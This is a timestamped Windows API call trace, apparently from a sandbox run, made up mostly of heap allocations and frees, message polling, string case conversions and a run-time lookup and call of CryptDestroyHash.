[0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0160.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0160.873] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0160.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.873] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.873] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0160.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0160.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0160.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2db8 [0160.874] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.874] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.874] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.875] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.875] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa448 [0160.875] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa610 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa700 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5e0 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3b8 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0160.876] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3a0 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa580 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4d8 [0160.876] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5c8 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.877] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0160.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa460 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0160.877] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.877] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.877] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.878] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0160.878] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0160.878] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0160.878] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.878] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0160.879] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.879] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0160.880] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0160.880] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0160.880] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466e30 [0160.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466e30, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0160.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.881] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0160.881] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0160.881] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.882] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.882] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0160.882] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0160.883] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0160.883] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0160.884] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 